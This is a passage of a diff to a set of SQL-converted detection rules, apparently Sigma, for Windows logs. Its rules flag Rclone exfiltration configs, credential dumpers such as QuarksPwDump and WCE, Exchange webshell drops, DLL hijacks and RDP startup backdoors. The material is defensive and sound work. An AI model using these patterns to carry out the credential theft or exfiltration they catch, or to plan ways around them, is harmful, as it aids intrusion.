Research)", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "User with Privileges Logon", - "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "status": "test", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "falsepositives": [ + "System administrators managing certififcates." + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + ], + "filename": "file_event_win_susp_pfx_file_creation.yml" + }, + { + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "description": "Detects the creation of an file in user Word Startup", "author": "frack113", + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], "falsepositives": [ - "Unknown" + "Addition of legitimate plugins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_admin_logon.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "author": "Samir Bousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", - "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", + "status": "experimental", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "description": "Detects a dump file written by QuarksPwDump password dumper", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "status": "experimental", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.execution", + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' 